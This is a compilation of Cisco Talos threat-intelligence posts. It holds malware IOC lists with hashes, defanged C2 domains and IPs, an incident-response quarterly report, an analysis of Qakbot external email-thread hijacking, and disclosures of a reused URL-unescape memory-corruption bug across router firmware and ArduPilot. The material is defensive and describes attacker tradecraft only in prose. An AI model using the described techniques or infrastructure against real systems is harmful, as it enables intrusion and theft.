%TEMP%\RarSFX1\Newtonsoft.Json.dll 3
%TEMP%\RarSFX1\Renci.SshNet.dll 3
%TEMP%\RarSFX1\Ubiety.Dns.Core.dll 3
%TEMP%\RarSFX0\Release.exe 3
%TEMP%\RarSFX1\VACBypass.exe 3
%TEMP%\RarSFX0\VACBypass.sfx.exe 3
%TEMP%\RarSFX1\ProcessInjector.dll 2
%TEMP%\RarSFX1\Venge.exe 2
%TEMP%\Protect7d723a8e.dll 2
%APPDATA%\MSConfig.exe 2
%System32%\Tasks\'MSConfig' 2
*See JSON for more IOCs

File Hashes

057168fa7b59c38e34fddae10931b74390d7b16488c6ad927bdd1f463041667c 18f9814993009f5ef87b0e0703644273e51658f5882344b562501c0039931a4d 2425730fc69eb3d59994dfbec8080540a2df37d62d76668aa7f6253631ec697c 66598101b17560cb540cf640137d5dac28c5845f00aceca4262a56461219ccdc afdd30c190cf43d78f3cdee38bdc2786dfbbaf2d3c2be8f6d9a7c539f097f4fc c08c4a75c4a5e26e98643b054d0dd19b7c2b729531402d97ac75a17aeef7d17d c1c5d36e2794e08c6b400476b1a51f4c1c9b27ffee593dac838730ba27cc363b d675794864f828743967e774b888663ee3dbff471c159fbadb3a699c7085e658 df9cb829ee95a1722dd61bfcb10145e1b11881fe1a86b296936a8aaa3011fcff e6f42069d0c8ef236da20b41e61c25cc593ac7265057c996b35b67d73b7154e8

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.LokiBot-9957019-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Mutexes Occurrences
3749282D282E1E80C56CAE5A 7
uoXVcKrtOqoPVAWBhQA 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
198[.]187[.]30[.]47 4
193[.]122[.]130[.]0 2
132[.]226[.]247[.]73 2
158[.]101[.]44[.]242 2
37[.]0[.]11[.]227 1
45[.]133[.]1[.]20 1
47[.]88[.]22[.]122 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
checkip[.]dyndns[.]org 6
sempersim[.]su 1
Files and or directories created Occurrences
%APPDATA%\D282E1 7
%APPDATA%\D282E1\1E80C5.lck 7
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 7
%System32%\Tasks\Updates 1
%TEMP%\tmp4B83.tmp 1
%APPDATA%\VQJJRC.exe 1
%System32%\Tasks\Updates\VQJJRC 1

File Hashes

22265bacbef33a949cd224cf527e8338b03f8d8a5e04acbbd3632e28af7e785a 2c93ec8bdcb28ec4793fb55a4ce8159287745c11d5cf36ca085c74c3925ff2e2 3e93bbc3ac47bb2cd468a1e58e9369a54215dfaaece767e99e40057ed7dd4c50 669363383d4189a6716b953aaf4663655dc22e960e002f100c3ef5012275db79 67fb6d554fb4128454a0fbaa1dd0becda062d72be7dfbb37a4b5dc1b7b5629ce 6bacc8bd474bde817e968bcedfe508492a100eb73749894ba4b61b2f6d0dec0d 6da89945dd9f904c718c4ae1de7aae9d311ac71317865718aca051854ff4913d 87878b131d80c5ad134ee68932fe4defbf5067a0a871f0cadba3e163f5e3cefd 99606bfc40c8743b6bc1a3059cf491b9105d1bbc5d3bd3de647781bce6d9636a 998474158374c53d0b802f00e92e9ef00d398321b90dab0464d50df65225a5e5 bf4a9315215e16a2239e01125082218867ffc5900e44de517d4c2b786ff1fa8a c29b9d1075e86788bab4a9e75334f36de07c1feb22500759db93d9379c875171 c86ba22021597e8876b4432a5ffb954f495e7f2a0a926af5f630e1f3e3e8acf5 d94a1e9281426e715a46338e94e6b16c614a9ff271da27b3a52c3ddc2985d914 df0fdfa13f4682ea0ca69bd3aeac4894184cd8aa1be913ca5954bb4394af1b2e df77c795653ea7686d5525118bc05d748a3393793a99960946dfa3bc5e188e02

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Quarterly Report: Incident Response Trends in Q2 2022

26 July 2022 at 14:03

Commodity malware usage surpasses ransomware by narrow margin 




For the first time in more than a year, ransomware was not the top threat Cisco Talos Incident Response (CTIR) responded to this quarter, as commodity malware surpassed ransomware by a narrow margin. This is likely due to several factors, including the closure of several ransomware groups, whether it be of their own volition or the actions of global law enforcement agencies and governments. 

Commodity malware was the top observed threat this quarter, a notable development given the general decrease in observations of attacks leveraging commodity trojans in CTIR engagements since 2020. These developments coincide with a general resurgence of certain email-based trojans in recent months, as law enforcement and technology companies have continued to attempt to disrupt and affect email-based malware threats like Emotet and Trickbot. This quarter featured malware such as the Remcos remote access trojan (RAT), Vidar infostealer, Redline Stealer and Qakbot (Qbot), a well-known banking trojan that in recent weeks, has been observed in new clusters of activity delivering a variety of payloads. 

Targeting


The top-targeted vertical continues to be telecommunications, following a trend where it was among the top targeted verticals in Q4 2021 and Q1 2022, closely followed by organizations in the education and health care sectors. 



Commodity malware


This quarter saw a notable increase in commodity malware threats compared to previous quarters. Commodity malware is widely available for purchase or free download, is typically not customized and is used by a variety of threat actors in various stages of their operations and/or to deliver additional threats, including many of the ransomware variants referenced below. 

In one engagement affecting a U.S. medical facility, CTIR identified a malicious Microsoft Excel file (XLS) disseminated via phishing emails delivering a variant of the Remcos RAT. Active since at least 2016, Remcos records keyboard and audio inputs, captures screenshots, gathers clipboard data and much more. CTIR identified remote network connections using a systems administrator account just prior to the suspected timeframe. The aforementioned XLS contains Visual Basic code which will execute once a user opens the file and enables macros. We identified an IP address, 209.127.19[.]101, within a PowerShell command that would eventually download the next stages of the infection from URLs hosted on that IP. In March 2022, this same IP address was also reported as associated with a Remcos RAT phishing campaign, suggesting CTIR was seeing an extension of this activity using lures to entice users to open a malicious XLS file that allegedly contains confidential information.

In recent weeks, Talos observed ongoing Qakbot activity leveraging thread hijacking, a method by which threat actors use compromised email accounts to insert malicious replies into the middle of an existing email conversation. In an engagement affecting a U.S. local government, CTIR investigated three waves of phishing emails that, upon user execution, subsequently delivered the Qakbot banking trojan. All three waves of emails were constructed in two different ways: Purely spoofed content using fake emails related to tax documents and a blend of thread hijacking leveraging spoofed and legitimate email body content designed to appear to be a reply to an ongoing email conversation. CTIR noted that the legitimate content appeared to primarily harvested from emails sent to external recipients in 2020 and 2021, which we’ll discuss in a forthcoming post. The legitimate content was partially scrubbed to remove certain email addresses within the text of the previous email messages, although at this time, the reason for this is unknown. While investigating the affected system, once the user clicked on the malicious link, a ZIP file was downloaded to the following directory, “C:/Users/<user>/Downloads”. The ZIP contained a Windows shortcut (LNK) file where the contents included a command intended to create a directory under the user profile and attempt to contact a C2 domain (bottlenuts[.]com) to retrieve a file and execute it using the Windows utility “regsvr32.exe”. While the Qakbot payload was not executed by the end user, the command line arguments and C2 domain are consistent with a recent publicly reported Qakbot campaign, suggesting that this is part of the same activity.

CTIR observed several information stealers this quarter, where in both incidents, MFA was not properly applied across the organization and their third parties. In one engagement, CTIR identified the Vidar information stealer affecting a telecommunications company based in the Philippines. First identified in 2018, Vidar is typically installed through spam emails and adware and potentially unwanted programs (PUPs). In this case, CTIR could not determine the initial access vector due to a lack of logging. However, the affected organization reported that the compromised victim did not have proper MFA applied. 

In a similar series of events, in a Redline Stealer engagement, CTIR investigated widespread adversary MFA authentication accessing the victim’s O365, Workday and Citrix VDI environments. Adversary authentication followed two successful phishing attacks designed to collect usernames, passwords and up to two hashed one-time passcodes (HOTPs). First discovered in 2020, the Redline Stealer is sold on Russian language forums and messaging platforms such as Telegram and has become increasingly popular in its role as a primary and/or secondary payload supplementing activity associated with other malware.


Ransomware 


Ransomware continued to be a top threat affecting Cisco customers. Of the ransomware engagements CTIR supported, this quarter featured previously seen high-profile ransomware-as-a-service (RaaS) variants, such as BlackCat (aka ALPHV) and Conti

In a BlackCat ransomware engagement affecting a U.S. telecommunications organization, the ransomware was effectively blocked and did not execute in the environment. However, through the course of the incident, CTIR analyzed artifacts determined to be instances of Cobalt Strike with a Delphi loader capable of performing Mimikatz memory-dumping operations. CTIR observed two malicious domains that redirected to known Cobalt Strike IP addresses. Notably, one of the domains, standwithukraine[.]space, appears to be a reference to the ongoing Russia-Ukraine war. CTIR also detected numerous file downloads for Impacket’s Secretsdump module (“secretsdump.exe”) that performs various techniques to harvest credentials. While the appearance of the Delphi loader is not novel, BlackCat joins other ransomware groups, including REvil/Sodinokibi that have been reported leveraging the Delphi loader to run a Cobalt Strike binary. 




In a Conti ransomware incident affecting a health care organization with locations across the U.S., Europe and the Middle East, CTIR observed a Conti affiliate exploiting Log4Shell (CVE-2021-44228, CVE-2021-45046, and related vulnerabilities) on a vulnerable VMware Horizon server, consistent with public reporting on Conti leveraging Log4Shell from December 2021. After establishing initial access, CTIR observed Cobalt Strike beaconing, system enumeration and unauthorized installation of remote access tools such as AnyDesk. The adversary then established persistence with the unauthorized creation of a local admin account and attempted to escalate privileges by modifying security-enabled group settings, service installation, disabling user accounts, accessing Windows Vault credentials, and resetting user passwords. For lateral movement, the adversary connected to IPC$ network shares and accessed a compromised host via remote desktop protocol (RDP). As discussed in the previous quarter, Conti is among the many threat actor groups leveraging Log4Shell as a means of initial infection, and we will likely continue to see threat actors adopting this exploit into their tactics, techniques and procedures (TTPs).     

Interestingly, in May 2022, Conti first announced it was ceasing operations, and by June had taken much of its infrastructure offline, including Tor servers used to leak data and negotiate ransom payments with victims. As the effects of Conti shutting down are still unknown at this time, a relatively new RaaS variant dubbed “Black Basta'' is a suspected re-brand of Conti, based on similarities in payment and leak sites and communication styles from some of its members. Black Basta, while unseen in incident response engagements thus far, began operating in mid-April 2022 and is gaining notoriety by leveraging the aforementioned Qakbot banking trojan to move laterally on compromised devices.


Initial vectors


This quarter also featured several engagements where adversaries identified and/or exploited misconfigured public-facing applications. This includes active scanning, exploitation of public-facing routers and servers, and leveraging Log4Shell in vulnerable applications, such as VMware Horizon.



In one engagement, an IT company with operations in Europe had a misconfigured and accidentally exposed Azure server. An adversary had attempted to remotely access the system before it was isolated. The system was alone in its subnet but connected to other internal resources via an IPSec VPN tunnel, a common VPN protocol used to establish a VPN connection. Analysis identified multiple failed login and brute force attempts from various external IP addresses, highlighting the need to update and limit exposure to prevent unwanted traffic from reaching the application.


Security weaknesses


The lack of MFA remains one of the biggest impediments to enterprise security. In at least two engagements this quarter, the affected organization’s partner or third party did not have MFA enabled, allowing the adversary to gain access and authenticate into the environment. CTIR recommends that organizations ensure all third parties in the environment are following MFA security policies and guidelines.

In the Remcos RAT engagement, CTIR identified that domain users had local administrator rights across the environment. This makes it easier for an adversary to exploit Active Directory and move laterally around the network.


Top-observed MITRE ATT&CK techniques


Below is a list of the MITRE ATT&CK techniques observed in this quarter’s IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. The table below represents the techniques used with a relevant example, and the approximate number of times seen. However, it is not an exhaustive list.

Key findings from the MITRE ATT&CK appendix include:
  • Adversaries leveraged valid accounts, achieved via techniques such as brute force, for initial access and persistence in several engagements this quarter.
  • In line with last quarter, we continue to observe email-based threats leveraging a variety of social engineering techniques to entice users to click or execute a given link or file.
  • We continue to see a variety of threats identify or exploit misconfigured or unpatched and vulnerable public-facing applications.
  • Attackers use multiple techniques associated with credential harvesting tools and utilities, such as Mimikatz and Impacket, to obtain account and password information. The observed collection techniques exhibited the actors’ interest in specific information, including collecting details from Active Directory to harvest credential information about domain members.

Tactic Technique Example
Initial Access (TA0001) T1190 Exploit Public-Facing Application Attackers successfully exploited a vulnerable application that was publicly exposed to the Internet.
Reconnaissance (TA0043) T1592 Gather Victim Host Information Malicious file contains details about host
Persistence (TA0003) T1053 Scheduled Task/Job Scheduled tasks were created on a compromised server
Execution (TA0002) T1059.001 Command and Scripting Interpreter: PowerShell Executes PowerShell code to retrieve information about the client's Active Directory environment
Discovery (TA0007) T1087 Account Discovery Use a utility like ADRecon to enumerate information on users and groups
Credential Access (TA0006) T1003.001 OS Credential Dumping: LSASS Memory Use “lsass.exe” for stealing password hashes from memory
Privilege Escalation (TA0004) T1574.002 Hijack Execution Flow: DLL Side-Loading A malicious PowerShell script attempted to side-load a DLL into memory
Lateral Movement (TA0008) T1021.001 Remote Desktop Protocol Adversary made attempts to move laterally using Windows Remote Desktop
Defense Evasion (TA0005) T1027 Obfuscated Files or Information Use base64-encoded PowerShell scripts
Command and Control (TA0011) T1219 Remote Access Software Remote access tools found on the compromised system
Impact (TA0040) T1486 Data Encrypted for Impact Deploy Conti ransomware and encrypt critical systems
Exfiltration (TA0010) T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage Actor exfiltrated data to file sharing site mega[.]nz
Collection (TA0009) T1114.003 Email Collection: Email Forwarding Rule Adversary used a compromised account to create a new inbox rule to place emails in a folder
Software/Tool S0029 PsExec Adversary made use of PsExec for lateral movement

What Talos Incident Response learned from a recent Qakbot attack hijacking old email threads

27 July 2022 at 12:00



By Nate Pors and Terryn Valikodath.  

Executive summary 

  • In a recent malspam campaign delivering the Qakbot banking trojan, Cisco Talos Incident Response (CTIR) observed the adversary using aggregated, old email threads from multiple organizations that we assess were likely harvested during the 2021 ProxyLogon-related compromises targeting vulnerable Microsoft Exchange servers. 
  • This campaign relies on external thread hijacking, whereby the adversary is likely using a bulk aggregation of multiple organizations’ harvested emails to launch focused phishing campaigns against previously uncompromised organizations. This differs from the more common approach to thread hijacking, in which attackers use a single compromised organization’s emails to deliver their threat. 
  • This many-to-one approach is unique from what we have generally observed in the past and is likely an indirect effect of the widespread compromises and exfiltration of large volumes of email from 2020 and 2021. 
  • Understanding the difference between external and single-victim thread hijacking is essential for detecting these threats. Below, we have several tips for defenders on how to identify key indicators of this activity. 

External thread hijacking  

Cisco Talos has observed threat actors using external thread hijacking, a method by which attackers weaponize emails previously harvested from other organizations. This differs from the more common approach to thread hijacking, in which adversaries compromise the victim organization’s Exchange server to obtain email threads that are then weaponized. We recently observed this in June 2022 as part of a broader campaign that delivered the Qakbot banking trojan. In this threat activity, the attackers used old emails harvested months to years ago during the 2021 ProxyLogon campaign, tracked as CVE-2021-26855, targeting vulnerable Exchange servers. 

External thread hijacking is not dependent on the threat actor gaining initial access to the victim environment. This is notable from a digital forensics and incident response (DFIR) perspective because the target organization only saw inbound phishing emails with its own legitimate emails as the source material, with multiple external organizations represented in the email threads. Our assessment of the adversary’s use of emails obtained from the ProxyLogon compromises is based on a number of observations, including the timing of the emails and research into publicly acknowledged ProxyLogon compromises. The attackers selectively used these emails to target senders or recipients from the target organization. 

In the external thread hijacking attack observed by CTIR, the adversary likely took the following steps:  

  1. The attacker took control of multiple third-party organizations’ Exchange servers or individual inboxes and exported emails for later use. The adversary selected the emails relevant to the target organization from the email dumps. This could have been accomplished with a regex search for “[@]company[.]com” in the “To” or “From” fields, although we did not directly observe the adversary’s selection process.  
  2. With the emails selected, the adversary ran a script to format the text of each legitimate thread into a phishing email by adding malicious content. 
  3. The attacker then sent the phishing emails to the original “[@]company[.]com” address in each legitimate thread from many adversary-controlled external mailboxes, completing the phishing attack. 

See the graphic below for a visual depiction of those steps. Note that the graphic shows only one third-party organization for simplicity, but emails harvested from multiple external organizations were involved in the attack observed by Cisco Talos.  



Victim thread hijacking 

To help showcase the unusual nature of the external thread hijacking, a brief breakdown of the more common victim thread hijacking is instructive. In 2021 and early 2022, adversary methods for thread-hijacking primarily depended on access to a victim’s Exchange server or individual email account. Most recently, this was seen in an IcedID campaign in early 2022 where the adversary compromised a victim’s Exchange server and used it as a base of operations to craft and send malicious emails based on recent legitimate email threads. 

In the past, in a standard malspam campaign delivering IcedID, an attacker would have taken control of the target organization’s Exchange server, then hijacked threads between internal users and/or their external partners. The key point is that the victim’s Exchange server served as both the source for the legitimate email thread and the sender for the malicious reply. These attacks were usually conducted immediately post-compromise, or shortly after. 

In a victim thread hijacking attack, the adversary would take the following steps: 

  1. Take control of the target organization’s Exchange server via ProxyLogon or another Exchange vulnerability. 
  2. The adversary would then use a legitimate email to craft a reply, inserting malicious content. Next, the adversary would send a malicious reply to the target user via the target organization’s Exchange server. This step of the attack would work equally well for internal-to-internal and internal-to-external phishing. 
  3. The target user, seeing the legitimate sender, source and thread history of the email, would be reasonably likely to click the link, thereby executing the IcedID payload on the system. 



Regarding the malware delivered in this campaign, there are numerous Snort rules and ClamAV signatures users can deploy to detect the deployment of Qakbot. While the primary focus of this post covers the process of how an attacker delivered this attack, if a user were to be infected with this particular campaign, Qakbot can steal financial data and login information from targeted systems. It also loads additional malware from its C2 servers, which Snort rules can detect and prevent. 

With a clear understanding of the difference between external thread hijacking versus victim thread hijacking, the next question is how to detect external thread hijacking, particularly in the current campaign using emails harvested through ProxyLogon attacks. This is a very relevant topic for DFIR professionals because accurate identification of this attack method might lower the priority of in-depth forensic examination of internal Exchange servers. 


Tips for Defenders 

Look for the following indicators as key signs of the external thread hijacking method: 

  • Spoofed senders. Since the adversary did not have access to the victim’s Exchange server, all emails originate from spoofed, external addresses. 
  • Old email threads, primarily from 2020 and 2021. However, Cisco Talos has observed at least one email thread as recent as May 2022, indicating that the adversary in question is actively using newly harvested emails. 
  • No or very limited internal-to-internal threads. Since the emails were harvested from external sources, there should be very few internal-to-internal threads seen in the legitimate content. 
  • Malformed replies. The adversary concatenated the old, legitimate content with the new, malicious content within the email body. This created a malformed appearance, as seen in the example below. 
  • Partially scrubbed email addresses. The adversary’s script removed some email addresses from the bodies of the legitimate emails during the construction of the malicious emails, as noted in the example below. 
  • Repetitive use of the same harvested legitimate email threads in multiple phishing waves. 
The example below was created by Cisco Talos to avoid displaying identifying information but is highly similar in all aspects to the external thread hijacking emails observed in the wild. 






Conclusion 

By early 2022, the direct effects of ProxyLogon, most famously exploited by the HAFNIUM group, largely quieted down. The external approach to thread hijacking, not necessarily specific to one adversary, appears to be one of the many indirect effects of the widespread compromises that resulted in exfiltration of large volumes of email from 2020 and 2021. Although those emails are relatively old by now, we will likely continue to observe adversaries leveraging bulk email aggregations from multiple organizations to launch focused phishing campaigns. Accurately recognizing the difference between external thread hijacking and victim thread hijacking can potentially avoid incorrect assessment of an incident and save dozens of hours of hunting for an internal breach that does not exist. 

Vulnerability Spotlight: How a code re-use issue led to vulnerabilities across multiple products

27 July 2022 at 16:22


By Francesco Benvenuto. 

Recently, I was performing some research on a wireless router and noticed the following piece of code: 

This unescape function will revert the URL encoded bytes to its original form. But something specifically caught my attention: There was no size check for the performed operations and the function assumes that after a ‘%’ there are always two bytes. So, what would happen if after ‘%’, only one character existed? The answer is that the s+3, in the strcpy, will access after the end of the string. So, it could lead to memory corruption.

Then, I tried to exploit this bug on the router in question. But based on how the URL string was managed in that device, it was not possible. But it had the potential to crash other web servers that used this piece of code. That function belonged to the freshtomato library. So, I searched for the source code and noticed that at the beginning of the file containing that function, there was the following comment: 

It was code from Broadcom. I searched for pieces of those comments on Google and found some projects using that code. Then, I also used grep.app writing a regex trying to catch the layout of the bug and found other projects. Some of these projects were code that can be tinkered with and/or in web server scenarios. So, we tested the code and eventually contacted multiple vendors regarding vulnerabilities in their respective products.  

The similarities between the code utilized by each of the different projects is so similar that it is reasonable to assume that the code is taken from the same initial source. Seeing as how the code originally held a Broadcom copyright, it is likely that the code was part of a reference implementation that Broadcom released to help customers implement an HTTP server using a product from Broadcom. This vulnerability becomes more interesting as the vulnerable products are looked in more depth, including the open-source software ArduPilot. This software is an open-source autonomous vehicle package, not tied to Broadcom in any way, so the vulnerable code made its way into the code base without a direct reference implementation. This sort of extended code reuse is extraordinarily difficult to track down even with modern-day secure coding practices due to code being slightly modified to suit each use case specifically. For these reasons, it is extraordinarily important for developers to be vigilant in reviewing external functionality that are modified and inserted into a code base, as well as for security researchers to investigate issues that could easily be slightly mutated across multiple software packages. 

Below are the vulnerabilities we disclosed and helped fix as part of this discovery. TALOS-2022-1509 TALOS-2022-1511 and TALOS-2022-1512 have been patched by their respective companies or maintainers. Talos additionally confirmed TALOS-2022-1510 is present in revisions 32270 to at least revision 48599 but was unpatched at the time of publishing, so later versions are also likely vulnerable.


TALOS-2022-1509 (CVE-2022-28664 - CVE-2022-28665) 

A memory corruption vulnerability in the httpd’s unescape functionality of FreshTomato, version 2022.1. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. 


TALOS-2022-1510 (CVE-2022-27631) 

A memory corruption vulnerability in the httpd’s unescape functionality of DD-WRT from Revision 32270 to Revision 48599 — a Linux-based firmware for embedded systems. Later versions of this product could also be vulnerable, as Talos recently confirmed that the issue was unpatched. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. 


TALOS-2022-1511 (CVE-2022-26376) 

A memory corruption vulnerability in both the official Asuswrt firmware as well as the Asuswrt-Merlin New Gen open-source firmware alternative for Asus wireless routers. The vulnerability exists in the httpd’s unescape functionality of these firmwares. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. ASUSWRT, the company’s user interface software for managing Asus devices, is also affected by this vulnerability. 


TALOS-2022-1512 (CVE-2022-28711) 

A memory corruption vulnerability in the cgi.c’s unescape functionality of ArduPilot APWeb from master branch 50b6b7ac to master branch 46177cb9. ArduPilot is an open-source software suite that allows users to program autonomous flying and driving devices like drones. A specially crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability. 

Threat Source newsletter (July 28, 2022) — What constitutes an "entry-level" job in cybersecurity?

28 July 2022 at 18:00

By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

Between the White House’s recent meeting, countless conference talks and report after report warning of cybersecurity burnout, there’s been a ton of talk recently around the cybersecurity skills gap and hiring. 

Everyone wants to know the magic ticket to figure out how to increase hiring at their cybersecurity practice without hiring somehow with under-developed skills that could leave clients open to attack. This is not a problem exclusive to cybersecurity, but I do find it interesting that there’s been so much talk about the problems the cybersecurity workforce faces and not much about actual solutions. 

I think a good place to start would change the meaning of what an “entry-level” position truly is in security. I came into this field with zero security experience from the domain of journalism. My family considered me to be “a computer guy” just because I was good at searching the internet for public information as a journalist. Granted, I’m no security expert four years into this, but between internal mentorships and educational support outside of the company, I can at least write a basic ClamAV signature and could talk to a CEO about the difference between ransomware and business email compromise. Imagine what someone who at least knew what Kali Linux was before their first day could do with that same amount of time. 

I decided to go on LinkedIn and search for “entry-level” cybersecurity roles by literally clicking a box in the search function. Granted, this could be the LinkedIn algorithm serving me jobs that would be best suited for me based on my level of experience, but I found countless “entry-level” openings that I would not be qualified for based on the qualifications listed in the posting. Even if someone were to apply and still get an interview, who’s to say someone with less experience wouldn’t be deterred from applying in the first place by feeling they were under-qualified?  

One listing (I’m not naming any names) was for an “entry-level” cybersecurity analyst at a mid-size firm. The top requirement was that the candidate has “three-plus years of experience analyzing general cybersecurity-related technical problems" and a bachelor’s degree in “cybersecurity or a related field” and it would be “nice if you have” a master’s degree and several different certifications.  

Another analyst role didn’t ask for a specific number of years’ worth of experience, but it did say the ideal candidate needs: 
  • Strong experience administering endpoint protection. 
  • Strong experience managing email security products. 
  • Familiarity with incident response procedures, identity management and multi-factor authentication. 
I’d be willing to bet there are folks who have years of experience at Talos who don’t have “strong experience” with all of those fields listed above.  And I’ve met team members who didn’t go to college for security — they may have started out in the military or a totally different field before pivoting to security.  

I’m not saying we should let just anyone manage a SOC team for a Fortune 500 company. But if we’re going to build up the next generation of defenders, we do need to widen the scope of what it means to be at the entry-level of cybersecurity. I would encourage hiring managers to take chances on people who don’t have a “traditional” security background and be willing to invest time and money into training employees who are keen and willing but may not have the exact certifications, which can always come later. 

If every “entry-level” job requires years of experience, how is anyone ever actually supposed to get their first job in security? And don’t say “pay your dues at unpaid internships.” 

  

The one big thing 


Since the Russian invasion of Ukraine began, Ukrainians have been under a nearly constant barrage of cyber attacks. Working jointly with Ukrainian organizations, Cisco Talos has discovered a fairly uncommon piece of malware targeting Ukraine — the GoMet backdoor — this time aimed at a large software development company whose software is used in various state organizations within Ukraine. As this firm is involved in software development, we cannot ignore the possibility that the perpetrating threat actor's intent was to gain access to source a supply chain-style attack, though at this time we do not have any evidence that they were successful. 

Why do I care? 

I shouldn’t have to tell you why you should care about Ukraine. But if anything, this attack shows that even though public discussion around the war and follow-on cyber attacks has waned, the threat isn’t going anywhere. 

So now what? 

In this instance, we saw a software company targeted with a backdoor designed for additional persistent access. This access could be leveraged in a variety of ways, including deeper access or launching additional attacks, including the potential for software supply chain compromise. It's a reminder that although the cyber activities haven't necessarily risen to the level many have expected, Ukraine is still facing a well-funded, determined adversary that can inflict damage in a variety of ways — this is just the latest example of those attempts. As always, Talos continually updates our coverage around the threats Ukraine faces and appropriate Cisco Secure protections. 

 

Other news of note


Spyware continues to be a top threat for government officials, politicians and activists. The European Union recently found the NSO Group’s Pegasus spyware installed on several employees’ mobile devices. Apple initially alerted the EU that the devices had indicators of compromise related to the spyware. This led the European Commission to reach out to Israel, asking the country to "prevent the misuse of their products in the EU.” Meanwhile, the Canadian Parliament is investigating if the national police force uses Pegasus as part of its surveillance operations. Previously, the RCMP said it only used Pegasus in severe cases, deploying it 10 times between 2018 and 2020. (Reuters, Politico)  

An attacker claims to have stolen data from more than 5.4 million Twitter users and is selling it on the dark web for $30,000. The seller using the username "devil" claims the data includes “Celebrities, to Companies, randoms, OGs, etc.” Twitter said it launched an investigation to verify the authenticity of the data and notify any users whose accounts may have been affected. The attacker exploited a vulnerability that was reported to Twitter several months ago through its bug bounty program and has since been fixed. Breached Forums, where the data is listed for sale, is the same site where an attacker leaked 23 TB of data from 1 billion Chinese citizens earlier this year. (Fortune, The Register

A new malware tool broker known as “Knotweed” has been outed as the source of several spyware attacks and zero-day exploits against Microsoft and Adobe products. Microsoft stated in a new report that it believes the group is “linked to the development and attempted sale of a malware toolset called Subzero, which enables customers to hack into their targets' computers, phones, network infrastructure and internet-connected devices.” Some of the exploits the group sold were recently used in cyber attacks against Austria, Panama and the U.K. (Microsoft, Dark Reading


Can’t get enough Talos? 


Upcoming events where you can find Talos 


BlackHat U.S. (Aug. 6 - 11, 2022)
Las Vegas, Nevada 

DEF CON U.S. (Aug. 11 - 14, 2022)
Las Vegas, Nevada 

Virtual 

Most prevalent malware files from Talos telemetry over the past week  


MD5: 2915b3f8b703eb744fc54c81f4a9c67f   
Typical Filename: VID001.exe   
Claimed Product: N/A   
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: a087b2e6ec57b08c0d0750c60f96a74c     
Typical Filename: AAct.exe     
Claimed Product: N/A       
Detection Name: PUA.Win.Tool.Kmsauto::1201  

MD5: 7bdbd180c081fa63ca94f9c22c457376  
Typical Filename: c0dwjdi6a.dll  
Claimed Product: N/A   
Detection Name: Trojan.GenericKD.33515991 

MD5: 2c8ea737a232fd03ab80db672d50a17a    
Typical Filename: LwssPlayer.scr    
Claimed Product: 梦想之巅幻灯播放器    
Detection Name: Auto.125E12.241442.in02    

Threat Roundup for July 22 - 29

29 July 2022 at 19:08


Talos is publishing a glimpse into the most prevalent threats we've observed from July 22 - 29. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Dropper.Shiz-9957065-0 Dropper Shiz is a remote access trojan that allows an attacker to access an infected machine in order to harvest sensitive information. It is commonly spread via droppers or by visiting a malicious site.
Win.Dropper.Tofsee-9957067-0 Dropper Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control.
Win.Ransomware.TeslaCrypt-9957356-0 Ransomware TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily.
Win.Virus.Expiro-9957505-0 Virus Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
